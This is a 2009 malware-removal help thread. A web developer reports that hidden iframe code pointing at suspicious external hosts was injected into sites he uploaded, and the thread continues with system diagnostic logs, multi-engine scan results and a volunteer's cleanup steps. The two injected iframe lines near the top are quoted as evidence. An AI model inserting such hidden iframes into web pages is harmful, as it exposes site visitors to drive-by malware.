Active Strange Issues must be some malware

[Active] Strange Issues must be some malware

Hello Security Masters

Form the last few days, there are some strange problems in my computer. Like :

1) Some of the software are now.
2) Sometimes I can not connect to internet.
3) I am a web programmer, and some of my clients complained that the
code i uploaded to their server has some strange code in it. For example:

<iframe src= "http://cutlot.cn/in.cgi?income50" width=1 height=1 style= "visibility: hidden ">

echo "<iframe src=\ "http://internetcountercheck.com/?click=27319031\" width=1 height=1 style=\ "visibility:hidden;position:absolute\ "></iframe> ";

I checked in the DreamWeaver, and found that there is nothing like that, but when i open those files in my browser, i found both the strange codes.
It seems that like other programs, the trojan / worm as infected my DreamWeaver and FTP program so that it is causing all this.

Can u please let me know what to do ? and How to remove the terror from my computer ?

Regards
Zeeshan Hashmi

 

Thanks, here is the contents of DDS.TXT

//---------------------------------------------

DDS (Ver_09-03-16.01) - FAT32x86
Run by Zeeshan Hashmi at 20:25:48.98 on Thu 04/09/2009
Internet Explorer: 6.0.2900.2180 BrowserJavaVersion: 1.6.0_12
Microsoft Windows XP Professional 5.1.2600.2.1252.1.1033.18.1013.303 [GMT 5:00]

AV: AVG Anti-Virus Free *On-access scanning enabled* (Updated)
AV: McAfee VirusScan *On-access scanning enabled* (Updated)
FW: McAfee Personal Firewall *enabled*

============== Running Processes ===============

C:\WINDOWS\system32\svchost -k DcomLaunch
svchost.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
svchost.exe
svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\PROGRA~1\A4Tech\Keyboard\Ikeymain.exe
C:\WINDOWS\system32\igfxtray.exe
C:\WINDOWS\system32\igfxpers.exe
D:\Program Files\Adobe\Acrobat 8.0\Acrobat\Acrotray.exe
C:\Program Files\McAfee.com\Agent\mcagent.exe
C:\WINDOWS\RTHDCPL.EXE
C:\Program Files\Java\jre6\bin\jusched.exe
C:\Documents and Settings\Zeeshan Hashmi\Local Settings\Application Data\Google\Update\GoogleUpdate.exe
D:\Program Files\Apache Software Foundation\Apache2.2\bin\httpd.exe
C:\Program Files\Messenger\msmsgs.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\Microsoft ActiveSync\Wcescomm.exe
C:\Program Files\Java\jre6\bin\jqs.exe
D:\Program Files\Apache Software Foundation\Apache2.2\bin\httpd.exe
C:\PROGRA~1\MICROS~3\rapimgr.exe
D:\Program Files\Apache Software Foundation\Apache2.2\bin\ApacheMonitor.exe
C:\Program Files\McAfee\SiteAdvisor\McSACore.exe
C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
c:\program files\common files\mcafee\mna\mcnasvc.exe
c:\PROGRA~1\COMMON~1\mcafee\mcproxy\mcproxy.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files\McAfee\MPF\MPFSrv.exe
C:\Program Files\McAfee\MSK\MskSrver.exe
D:\Program Files\MySQL\MySQL Server 5.1\bin\mysqld.exe
C:\WINDOWS\system32\svchost.exe -k netsvcs
C:\WINDOWS\system32\wscntfy.exe
C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcsysmon.exe
C:\Program Files\Spyware Terminator\sp_rsser.exe
C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
C:\PROGRA~1\AVG\AVG8\avgrsx.exe
C:\Program Files\AVG\AVG8\avgcsrvx.exe
C:\Program Files\AVG\AVG8\avgtray.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcods.exe
c:\PROGRA~1\mcafee\VIRUSS~1\mcvsshld.exe
C:\WINDOWS\system32\svchost.exe -k imgsvc
C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
C:\PROGRA~1\AVG\AVG8\avgnsx.exe
C:\Program Files\Mozilla Firefox\firefox.exe
D:\Program Files\Adobe\Adobe Photoshop CS3\Photoshop.exe
D:\Program Files\Adobe\Adobe InDesign CS3\InDesign.exe
D:\Program Files\Adobe\Acrobat 8.0\Acrobat\Acrobat.exe
D:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE
C:\Program Files\AVG\AVG8\avgcsrvx.exe
c:\PROGRA~1\mcafee.com\agent\mcupdate.exe
C:\Documents and Settings\Zeeshan Hashmi\Desktop\dds.pif

============== Pseudo HJT Report ===============

uStart Page = about:blank
uInternet Settings,ProxyOverride = *.local
uURLSearchHooks: Yahoo! Toolbar: {ef99bd32-c1fb-11d2-892f-0090271d4f88} - c:\progra~1\yahoo!\companion\installs\cpn\yt.dll
BHO: &Yahoo! Toolbar Helper: {02478d38-c3f9-4efb-9b51-7695eca05670} - c:\progra~1\yahoo!\companion\installs\cpn\yt.dll
BHO: Adobe PDF Reader Link Helper: {06849e9f-c8d7-4d59-b87d-784b7d6be0b3} - c:\program files\common files\adobe\acrobat\activex\AcroIEHelper.dll
BHO: McAfee Phishing Filter: {27b4851a-3207-45a2-b947-be8afe6163ab} - c:\progra~1\mcafee\msk\mskapbho.dll
BHO: AVG Safe Search: {3ca2f312-6f6e-4b53-a66e-4e65e497c8c0} - c:\program files\avg\avg8\avgssie.dll
BHO: {5C255C8A-E604-49b4-9D64-90988571CECB} - No File
BHO: scriptproxy: {7db2d5a0-7241-4e79-b68d-6309f01c5231} - c:\program files\mcafee\virusscan\scriptsn.dll
BHO: Windows Live Sign-in Helper: {9030d464-4c02-4abf-8ecc-5164760863c6} - c:\program files\common files\microsoft shared\windows live\WindowsLiveLogin.dll
BHO: Adobe PDF Conversion Toolbar Helper: {ae7cd045-e861-484f-8273-0445ee161910} - d:\program files\adobe\acrobat 8.0\acrobat\AcroIEFavClient.dll
BHO: McAfee SiteAdvisor BHO: {b164e929-a1b6-4a06-b104-2cd0e90a88ff} - c:\progra~1\mcafee\sitead~1\mcieplg.dll
BHO: Java(tm) Plug-In 2 SSV Helper: {dbc80044-a445-435b-bc74-9c25c1c588a9} - c:\program files\java\jre6\bin\jp2ssv.dll
BHO: JQSIEStartDetectorImpl Class: {e7e6f031-17ce-4c07-bc86-eabfe594f69c} - c:\program files\java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
BHO: SingleInstance Class: {fdad4da1-61a2-4fd8-9c17-86f7ac245081} - c:\progra~1\yahoo!\companion\installs\cpn\YTSingleInstance.dll
TB: Adobe PDF: {47833539-d0c5-4125-9fa8-0819e2eaac93} - d:\program files\adobe\acrobat 8.0\acrobat\AcroIEFavClient.dll
TB: Yahoo! Toolbar: {ef99bd32-c1fb-11d2-892f-0090271d4f88} - c:\progra~1\yahoo!\companion\installs\cpn\yt.dll
TB: McAfee SiteAdvisor Toolbar: {0ebbbe48-bad4-4b4c-8e5a-516abecae064} - c:\progra~1\mcafee\sitead~1\mcieplg.dll
TB: NuSphere ToolBar: {0f62d223-9206-4ea3-9ea8-d0f3c7c82aca} - c:\program files\nusphere\phped\NuSphereIEBar.dll
EB: Adobe PDF: {182ec0be-5110-49c8-a062-beb1d02a220b} - d:\program files\adobe\acrobat 8.0\acrobat\AcroIEFavClient.dll
uRun: [Skype] "c:\program files\skype\phone\Skype.exe" /nosplash /minimized
uRun: [Google Update] "c:\documents and settings\zeeshan hashmi\local settings\application data\google\update\GoogleUpdate.exe" /c
uRun: [MSMSGS] "c:\program files\messenger\msmsgs.exe" /background
uRun: [H/PC Connection Agent] "c:\program files\microsoft activesync\Wcescomm.exe "
mRun: [iKeyWorks] c:\progra~1\a4tech\keyboard\Ikeymain.exe
mRun: [IgfxTray] c:\windows\system32\igfxtray.exe
mRun: [HotKeysCmds] c:\windows\system32\hkcmd.exe
mRun: [Persistence] c:\windows\system32\igfxpers.exe
mRun: [Acrobat Assistant 8.0] "d:\program files\adobe\acrobat 8.0\acrobat\Acrotray.exe "
mRun: [<NO NAME>]
mRun: [mcagent_exe] "c:\program files\mcafee.com\agent\mcagent.exe" /runkey
mRun: [RTHDCPL] RTHDCPL.EXE
mRun: [SkyTel] SkyTel.EXE
mRun: [Alcmtr] ALCMTR.EXE
mRun: [SunJavaUpdateSched] "c:\program files\java\jre6\bin\jusched.exe "
mRun: [AVG8_TRAY] c:\progra~1\avg\avg8\avgtray.exe
StartupFolder: c:\docume~1\alluse~1.win\startm~1\programs\startup\adobea~1.lnk - c:\windows\installer\{ac76ba86-1033-0000-7760-000000000003}\_SC_Acrobat.exe
StartupFolder: c:\docume~1\alluse~1.win\startm~1\programs\startup\adobea~2.lnk - d:\program files\adobe\acrobat 8.0\acrobat\AdobeCollabSync.exe
StartupFolder: c:\docume~1\alluse~1.win\startm~1\programs\startup\micros~1.lnk - d:\program files\microsoft office\office11\ONENOTEM.EXE
StartupFolder: c:\docume~1\alluse~1.win\startm~1\programs\startup\monito~1.lnk - d:\program files\apache software foundation\apache2.2\bin\ApacheMonitor.exe
IE: Append to existing PDF - d:\program files\adobe\acrobat 8.0\acrobat\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convert link target to Adobe PDF - d:\program files\adobe\acrobat 8.0\acrobat\AcroIEFavClient.dll/AcroIECapture.html
IE: Convert link target to existing PDF - d:\program files\adobe\acrobat 8.0\acrobat\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convert selected links to Adobe PDF - d:\program files\adobe\acrobat 8.0\acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
IE: Convert selected links to existing PDF - d:\program files\adobe\acrobat 8.0\acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
IE: Convert selection to Adobe PDF - d:\program files\adobe\acrobat 8.0\acrobat\AcroIEFavClient.dll/AcroIECapture.html
IE: Convert selection to existing PDF - d:\program files\adobe\acrobat 8.0\acrobat\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convert to Adobe PDF - d:\program files\adobe\acrobat 8.0\acrobat\AcroIEFavClient.dll/AcroIECapture.html
IE: E&xport to Microsoft Excel - d:\progra~1\micros~1\office11\EXCEL.EXE/3000
IE: NuSphere PhpED :: Debug this page - c:\program files\nusphere\phped\NuSphereIEBar.dll/1000
IE: {FB5F1910-F110-11d2-BB9E-00C04F795683} - c:\program files\messenger\msmsgs.exe
IE: {2EAF5BB1-070F-11D3-9307-00C04FAE2D4F} - {2EAF5BB0-070F-11D3-9307-00C04FAE2D4F} - c:\progra~1\micros~3\INetRepl.dll
IE: {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - {2EAF5BB0-070F-11D3-9307-00C04FAE2D4F} - c:\progra~1\micros~3\INetRepl.dll
IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503} - d:\progra~1\micros~1\office11\REFIEBAR.DLL
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_12-windows-i586.cab
DPF: {CAFEEFAC-0016-0000-0012-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_12-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_12-windows-i586.cab
Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - c:\program files\avg\avg8\avgpp.dll
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\progra~1\mcafee\sitead~1\McIEPlg.dll
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - c:\progra~1\common~1\skype\SKYPE4~1.DLL
Notify: avgrsstarter - avgrsstx.dll
Notify: igfxcui - igfxdev.dll
SecurityProviders: msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll, digiwet.dll

================= FIREFOX ===================

FF - ProfilePath - c:\docume~1\zeesha~1\applic~1\mozilla\firefox\profiles\dtdedgo9.default\
FF - prefs.js: browser.search.defaulturl - hxxp://www.google.com/search?lr=&ie=UTF-8&oe=UTF-8&q=
FF - prefs.js: browser.search.selectedEngine - Google
FF - prefs.js: browser.startup.homepage -
FF - component: c:\program files\avg\avg8\firefox\components\avgssff.dll
FF - component: c:\program files\mcafee\siteadvisor\components\McFFPlg.dll
FF - plugin: c:\documents and settings\zeeshan hashmi\local settings\application data\google\update\1.2.141.5\npGoogleOneClick7.dll
FF - plugin: d:\program files\adobe\acrobat 8.0\acrobat\browser\nppdf32.dll

============= SERVICES / DRIVERS ===============

R1 AvgLdx86;AVG Free AVI Loader Driver x86;c:\windows\system32\drivers\avgldx86.sys [2009-4-9 325640]
R1 AvgMfx86;AVG Free On-access Scanner Minifilter Driver x86;c:\windows\system32\drivers\avgmfx86.sys [2009-4-9 27656]
R1 AvgTdiX;AVG Free8 Network Redirector;c:\windows\system32\drivers\avgtdix.sys [2009-4-9 108552]
R1 mfehidk;McAfee Inc. mfehidk;c:\windows\system32\drivers\mfehidk.sys [2009-1-11 213640]
R2 Apache2.2;Apache2.2;d:\program files\apache software foundation\apache2.2\bin\httpd.exe [2008-12-10 24636]
R2 avg8wd;AVG Free8 WatchDog;c:\progra~1\avg\avg8\avgwdsvc.exe [2009-4-9 298264]
R2 McAfee SiteAdvisor Service;McAfee SiteAdvisor Service;c:\program files\mcafee\siteadvisor\McSACore.exe [2009-2-6 210216]
R2 McProxy;McAfee Proxy Service;c:\progra~1\common~1\mcafee\mcproxy\mcproxy.exe [2009-1-11 359952]
R2 McShield;McAfee Real-time Scanner;c:\progra~1\mcafee\viruss~1\mcshield.exe [2009-1-11 144704]
R3 McSysmon;McAfee SystemGuards;c:\progra~1\mcafee\viruss~1\mcsysmon.exe [2009-1-11 606736]
R3 mfeavfk;McAfee Inc. mfeavfk;c:\windows\system32\drivers\mfeavfk.sys [2009-1-11 79304]
R3 mfebopk;McAfee Inc. mfebopk;c:\windows\system32\drivers\mfebopk.sys [2009-1-11 35272]
R3 mferkdk;McAfee Inc. mferkdk;c:\windows\system32\drivers\mferkdk.sys [2009-1-11 34216]
R3 mfesmfk;McAfee Inc. mfesmfk;c:\windows\system32\drivers\mfesmfk.sys [2009-1-11 40552]
S1 ethjnevj;ethjnevj;c:\windows\system32\drivers\ethjnevj.sys [2009-4-8 136256]

=============== Created Last 30 ================


==================== Find3M ====================

2009-02-20 09:57 410,984 a------- c:\windows\system32\deploytk.dll
2009-02-06 18:52 49,504 a------- c:\windows\system32\sirenacm.dll
2009-02-05 11:25 44,544 -------- c:\windows\AWuninstall.exe
2009-01-12 11:35 86,327 a------- c:\windows\pchealth\helpctr\offlinecache\index.dat
2009-01-11 01:54 315,392 a------- c:\windows\HideWin.exe
2009-01-11 01:32 21,640 a------- c:\windows\system32\emptyregdb.dat

============= FINISH: 20:26:28.95 ===============

 

Here are the Contents of Attach.Txt

UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
IF REQUESTED, ZIP IT UP & ATTACH IT

DDS (Ver_09-03-16.01)

Microsoft Windows XP Professional
Boot Device: \Device\HarddiskVolume1
Install Date: 1/11/2009 1:37:56 AM
System Uptime: 4/9/2009 7:50:38 AM (13 hours ago)

Motherboard: Intel Corporation | | D945GCCR
Processor: Intel(R) Core(TM)2 CPU 4400 @ 2.00GHz | LGA 775 | 1994/200mhz

==== Disk Partitions =========================

C: is FIXED (FAT32) - 37 GiB total, 7.85 GiB free.
D: is FIXED (FAT32) - 37 GiB total, 33.398 GiB free.
E: is FIXED (FAT32) - 37 GiB total, 35.849 GiB free.
F: is FIXED (FAT32) - 37 GiB total, 35.074 GiB free.
G: is CDROM (CDFS)
H: is FIXED (FAT32) - 233 GiB total, 231.724 GiB free.
I: is CDROM (CDFS)
J: is Removable

==== Disabled Device Manager Items =============

Class GUID: {4D36E97E-E325-11CE-BFC1-08002BE10318}
Description: PCI Simple Communications Controller
Device ID: PCI\VEN_11C1&DEV_0620&SUBSYS_062011C1&REV_00\4&1E46F438&0&20F0
Manufacturer:
Name: PCI Simple Communications Controller
PNP Device ID: PCI\VEN_11C1&DEV_0620&SUBSYS_062011C1&REV_00\4&1E46F438&0&20F0
Service:

==== System Restore Points ===================

RP71: 2/25/2009 12:05:06 AM - Installed Extension Manager
RP72: 2/26/2009 7:01:43 PM - System Checkpoint
RP73: 3/1/2009 8:28:06 AM - System Checkpoint
RP74: 3/4/2009 6:53:33 PM - System Checkpoint
RP75: 3/5/2009 8:53:29 PM - System Checkpoint
RP76: 3/6/2009 9:31:26 PM - System Checkpoint
RP77: 3/8/2009 1:41:03 PM - System Checkpoint
RP78: 3/9/2009 6:28:45 PM - System Checkpoint
RP79: 3/10/2009 7:04:12 PM - System Checkpoint
RP80: 3/10/2009 7:46:10 PM - Installed Microsoft ActiveSync
RP81: 3/12/2009 2:06:15 PM - System Checkpoint
RP82: 3/13/2009 4:47:54 PM - System Checkpoint
RP83: 3/14/2009 7:58:29 PM - System Checkpoint
RP84: 3/15/2009 8:13:11 PM - System Checkpoint
RP85: 3/16/2009 8:45:18 PM - System Checkpoint
RP86: 3/18/2009 9:35:29 AM - Removed Windows Live Communications Platform
RP87: 3/18/2009 9:36:07 AM - Removed Windows Live Call
RP88: 3/18/2009 9:36:36 AM - Removed Windows Live Essentials
RP89: 3/19/2009 1:06:04 PM - System Checkpoint
RP90: 3/19/2009 11:16:41 PM - Installed Auto Avatar Prerequisites.
RP91: 3/20/2009 1:42:28 PM - Removed Auto Avatar Prerequisites.
RP92: 3/21/2009 2:05:33 PM - System Checkpoint
RP93: 3/22/2009 3:32:56 PM - System Checkpoint
RP94: 3/23/2009 6:43:37 PM - System Checkpoint
RP95: 3/25/2009 10:51:47 AM - System Checkpoint
RP96: 3/26/2009 11:45:07 AM - System Checkpoint
RP97: 3/27/2009 3:24:27 PM - System Checkpoint
RP98: 3/28/2009 4:37:09 PM - System Checkpoint
RP99: 3/30/2009 8:43:54 AM - System Checkpoint
RP100: 3/31/2009 11:06:48 AM - System Checkpoint
RP101: 4/1/2009 4:03:33 PM - System Checkpoint
RP102: 4/2/2009 5:04:59 PM - System Checkpoint
RP103: 4/3/2009 5:48:40 PM - System Checkpoint
RP104: 4/5/2009 10:06:51 AM - System Checkpoint
RP105: 4/6/2009 12:44:28 PM - System Checkpoint
RP106: 4/7/2009 12:55:55 PM - System Checkpoint
RP107: 4/8/2009 1:00:13 PM - System Checkpoint
RP108: 4/8/2009 6:55:52 PM - Installed Windows XP KB958644.
RP109: 4/9/2009 8:28:15 AM - Spyware Terminator - restore point
RP110: 4/9/2009 9:14:24 AM - Spyware Terminator - restore point
RP111: 4/9/2009 9:17:08 AM - Installed AVG Free 8.5
RP112: 4/9/2009 9:20:01 AM - Avg8 Update

==== Installed Programs ======================

3D Shadow by Lokas Software
A4Tech iKeyWorks 7.72
AAC Decoder
Add or Remove Adobe Creative Suite 3 Design Premium
Adobe Acrobat 8 Professional
Adobe Anchor Service CS3
Adobe Asset Services CS3
Adobe Bridge CS3
Adobe Bridge Start Meeting
Adobe BridgeTalk Plugin CS3
Adobe Camera Raw 4.0
Adobe CMaps
Adobe Color - Photoshop Specific
Adobe Color Common Settings
Adobe Color EU Extra Settings
Adobe Color JA Extra Settings
Adobe Color NA Recommended Settings
Adobe Creative Suite 3 Design Premium
Adobe Default Language CS3
Adobe Device Central CS3
Adobe Dreamweaver CS3
Adobe ExtendScript Toolkit 2
Adobe Extension Manager CS3
Adobe Flash Player 10 ActiveX
Adobe Flash Player 10 Plugin
Adobe Fonts All
Adobe Help Viewer CS3
Adobe InDesign CS3
Adobe InDesign CS3 Icon Handler
Adobe Linguistics CS3
Adobe MotionPicture Color Files
Adobe PDF Library Files
Adobe Photoshop CS3
Adobe Setup
Adobe Shockwave Player
Adobe SING CS3
Adobe Stock Photos CS3
Adobe Type Support
Adobe Update Manager CS3
Adobe Version Cue CS3 Client
Adobe WAS CS3
Adobe WinSoft Linguistics Plugin
Adobe XMP Panels CS3
AHV content for Acrobat and Flash
Apache HTTP Server 2.2.11
AutoUpdate
AVG 8.5
Choice Guard
CoffeeCup Web Form Builder - Trial
Compatibility Pack for the 2007 Office system
CSE HTML Validator Lite v6.52
DivX Codec
DivX Converter
DivX Player
DivX Plus DirectShow Filters
DivX Version Checker
DivX Web Player
FileZilla Client 3.2.3.1
Google Chrome
H.264 Decoder
High Definition Audio Driver Package - KB888111
Hotfix for Windows XP (KB909394)
Intel(R) Graphics Media Accelerator Driver
Intel(R) PRO Network Connections 11.2.0.69
Java(TM) 6 Update 12
Junk Mail filter update
Macromedia Dreamweaver MX
Macromedia Extension Manager
McAfee SecurityCenter
Microsoft .NET Framework 2.0
Microsoft ActiveSync
Microsoft Application Error Reporting
Microsoft Office OneNote 2003
Microsoft Office Professional Edition 2003
Microsoft Silverlight
Microsoft Visual C++ 2005 Redistributable
MKV Splitter
Mozilla Embedded Browser version 2.0
Mozilla Firefox (3.0.8)
MSN
MSVCRT
MSXML 4.0 SP2 Parser and SDK
MySQL Server 5.1
MySQL Tools for 5.0
NuSphere PhpED version 5.6
PDF Settings
php-4.4.8 for NuSphere PhpED
php-5.2.6 for NuSphere PhpED
PHP 5.2.8
Php Documentor version 1.4.2 for NuSphere PhpED
phpDesigner version 6.2.3
Polystyle 2.0zo (trial) for NuSphere PhpED
Realtek High Definition Audio Driver
Security Update for Windows XP (KB958644)
Segoe UI
Skype™ 3.8
Spyware Terminator
Tennis Elbow 2005 1.0
Update for Windows XP (KB898461)
VC80CRTRedist - 8.0.50727.762
WebFldrs XP
Windows Installer 3.1 (KB893803)
Windows Live Call
Windows Live Communications Platform
Windows Live Essentials
Windows Live Mail
Windows Live Messenger
Windows Live Sign-in Assistant
Windows Live Upload Tool
WinRAR archiver
WinSCP 4.2.1 beta
XP Codec Pack
Yahoo! Messenger
Yahoo! Toolbar

==== Event Viewer Messages From Past Week ========

4/5/2009 9:16:28 AM, error: Service Control Manager [7024] - The Apache2.2 service terminated with service-specific error 1 (0x1).
4/3/2009 7:34:44 AM, error: Server [2505] - The server could not bind to the transport \Device\NetBT_Tcpip_{6E883212-8725-4313-8967-A7BFD24DB8A8} because another computer on the network has the same name. The server could not start.
4/2/2009 11:10:02 AM, error: Dhcp [1002] - The IP address lease 192.168.1.2 for the Network Card with network address 0019D19D4B36 has been denied by the DHCP server 192.168.15.1 (The DHCP Server sent a DHCPNACK message).
4/2/2009 11:07:32 AM, error: Dhcp [1002] - The IP address lease 192.168.15.2 for the Network Card with network address 0019D19D4B36 has been denied by the DHCP server 192.168.1.1 (The DHCP Server sent a DHCPNACK message).
4/2/2009 9:14:36 AM, error: Dhcp [1002] - The IP address lease 192.168.15.3 for the Network Card with network address 0019D19D4B36 has been denied by the DHCP server 192.168.15.1 (The DHCP Server sent a DHCPNACK message).
4/7/2009 1:02:23 PM, error: ipnathlp [32003] - The Network Address Translator (NAT) was unable to request an operation of the kernel-mode translation module. This may indicate misconfiguration, insufficient resources, or an internal error. The data is the error code.
4/7/2009 7:33:57 PM, error: Service Control Manager [7009] - Timeout (30000 milliseconds) waiting for the crd service to connect.
4/7/2009 7:33:57 PM, error: Service Control Manager [7000] - The crd service failed to start due to the following error: The service did not respond to the start or control request in a timely fashion.
4/9/2009 4:42:08 PM, error: Service Control Manager [7031] - The McAfee Real-time Scanner service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 60000 milliseconds: Restart the service.

==== End Of File ===========================

 

Please guide me what's next to do.

 

Another BAD has started !

Now my applications, ie. Browsers (Firefox), DreamWeaver, Acrobat etc, shows "Illegal Operation" dialog box.

Please guide , there must be some thing wrong !

 

Hi zeeshanhashmi

You are running two anti-virus programs, this is not a good idea, they can conflict with each other and actually give you less protection and cause system problems
Please remove one ( 1 ) of them.

AVG 8.5
McAfee SecurityCenter

Now please do this.

• Please go to Jotti's malware scan
  
• Copy and paste the following file path into the "File to upload & scan "box on the top of the page: one at a time
  
  • c:\windows\system32\drivers\ethjnevj.sys
• Click on the submit button
  
• Please post the results in your next reply.

Geri

 

Hello Geri, I was really missing you ! Thanks for you to take on my issue.

I m removing the AVG antivirus from my system, actually my internet provider told me to install avg in order to be safe from the Destruction of CONFICKER.

Here are the results.

Scan taken on 12 Apr 2009 09:14:17 (GMT)
A-Squared
Found nothing
AntiVir
Found nothing
ArcaVir
Found nothing
Avast
Found Win32:Sloup
AVG Antivirus
Found nothing
BitDefender
Found Trojan.Rlsloupa.A
ClamAV
Found nothing
CPsecure
Found nothing
Dr.Web
Found Trojan.Siggen.2194
F-Prot Antivirus
Found W32/IEBooot.A.gen!Eldorado
F-Secure Anti-Virus
Found nothing
Ikarus
Found nothing
Kaspersky Anti-Virus
Found nothing
NOD32
Found nothing
Norman Virus Control
Found nothing
Panda Antivirus
Found nothing
Quick Heal
Found Backdoor.IEbooot.bne
Sophos Antivirus
Found nothing
VirusBuster
Found nothing
VBA32
Found nothing

 

Hi
Ok please do this.

Download ComboFix from Here to your Desktop.

It's best to disable realtime protection applications as they sometimes interfere with the tool.
Check this link for any applicable programs you may have.

• Close all open programs and windows
• Double click combofix.exe and follow the prompts.
• Vista users right click Combofix.exe and select Run As Administrator.
• When finished, it shall produce a log for you. Post the Combofix log

Note: Do not mouseclick combofix's window while its running. That may cause it to stall

**NOTE - Allow ComboFix to update if prompted.

Geri

 

Hello Geri
Thanks a lot for your reply.

You know, last time when I had some hard disk issues, I installed the ComboFix, and later a TROJAN or WORM with the name of RMTADMN was identified in ComboFix, and RMTADMN stands for REMOTE ADMIN.

Are u sure , that COMBO FIX is safe ?

 

Okay, its safe, i just read an article.

I m downloading it and then will post the details.

 

Geri, I just found that the combofix.exe has some thing like this :

Trojan RemAdm-Proclaunch!171

What to do ? should I continue ?

 

Hi
Yes please continue

 

ComboFix 09-04-12.03 - Zeeshan Hashmi 2009-04-12 21:05.1 - FAT32x86
Microsoft Windows XP Professional 5.1.2600.2.1252.1.1033.18.1013.465 [GMT 5:00]
Running from: c:\documents and settings\Zeeshan Hashmi\Desktop\BBS\ComboFix.exe
AV: AVG Anti-Virus Free *On-access scanning enabled* (Updated)
AV: McAfee VirusScan *On-access scanning enabled* (Updated)
FW: McAfee Personal Firewall *enabled*
* Created a new restore point

WARNING -THIS MACHINE DOES NOT HAVE THE RECOVERY CONSOLE INSTALLED !!
.

((((((((((((((((((((((((( Files Created from 2009-03-12 to 2009-04-12 )))))))))))))))))))))))))))))))
.

2009-04-09 15:25 . 2009-04-09 15:25 -------- d--h--w c:\windows\PIF
2009-04-09 07:34 . 2009-04-09 07:34 -------- d--h--w C:\$AVG8.VAULT$
2009-04-09 04:17 . 2009-04-09 04:17 108552 ----a-w c:\windows\system32\drivers\avgtdix.sys
2009-04-09 04:17 . 2009-04-09 04:17 10520 ----a-w c:\windows\system32\avgrsstx.dll
2009-04-09 04:17 . 2009-04-09 04:17 325640 ----a-w c:\windows\system32\drivers\avgldx86.sys
2009-04-09 04:17 . 2009-04-09 04:17 -------- d-----w c:\windows\system32\drivers\Avg
2009-04-09 04:17 . 2009-04-09 04:17 -------- d-----w c:\documents and settings\All Users.WINDOWS\Application Data\avg8
2009-04-09 03:23 . 2009-04-09 03:23 141312 ----a-w c:\windows\system32\drivers\sp_rsdrv2.sys
2009-04-09 03:23 . 2009-04-09 03:23 -------- d-----w c:\documents and settings\Zeeshan Hashmi\Application Data\Spyware Terminator
2009-04-09 03:23 . 2009-04-09 03:23 -------- d-----w c:\documents and settings\All Users.WINDOWS\Application Data\Spyware Terminator
2009-04-08 08:12 . 2009-04-08 08:12 136256 ----a-w c:\windows\system32\drivers\ethjnevj.sys
2009-04-07 14:34 . 2009-04-07 14:34 -------- d-----w c:\documents and settings\Zeeshan Hashmi\Application Data\MSNInstaller
2009-04-04 02:29 . 2009-04-04 02:29 192840 ----a-w c:\windows\dua.jpg
2009-03-21 03:03 . 2009-03-21 03:03 -------- d-----w c:\windows\system32\config\systemprofile\Application Data\SACore
2009-03-21 03:00 . 2009-03-21 03:00 -------- d-sh--w C:\FOUND.043
2009-03-16 15:06 . 2009-03-16 15:06 -------- d-----w c:\documents and settings\anis

.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2009-04-09 04:17 . 2009-04-09 04:17 -------- d-----w c:\program files\AVG
2009-04-09 03:23 . 2009-04-09 03:23 -------- d-----w c:\program files\Spyware Terminator
2009-03-18 04:37 . 2009-03-18 04:37 -------- d-----w c:\program files\Microsoft Silverlight
2009-03-10 14:49 . 2009-03-10 14:49 23006 ----a-w C:\ASLog.txt
2009-02-20 04:57 . 2009-02-20 04:57 410984 ----a-w c:\windows\system32\deploytk.dll
2009-02-18 08:36 . 2009-02-18 08:36 -------- d-----w c:\documents and settings\Zeeshan Hashmi\Application Data\Media Player Classic
2009-02-06 13:52 . 2009-02-06 13:52 49504 ----a-w c:\windows\system32\sirenacm.dll
2009-02-05 06:25 . 2009-02-05 06:25 44544 ------w c:\windows\AWuninstall.exe
2009-01-19 08:16 . 2009-01-10 20:54 206 ----a-w C:\realtek.log
2009-01-19 08:16 . 2007-07-03 08:55 467 ----a-w C:\RHDSetup.log
.

((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Skype "= "c:\program files\Skype\Phone\Skype.exe" [2008-11-07 21633320]
"Google Update "= "c:\documents and settings\Zeeshan Hashmi\Local Settings\Application Data\Google\Update\GoogleUpdate.exe" [2009-01-14 133104]
"MSMSGS "= "c:\program files\Messenger\msmsgs.exe" [2004-08-04 1667584]
"H/PC Connection Agent "= "c:\program files\Microsoft ActiveSync\Wcescomm.exe" [2006-11-13 1289000]

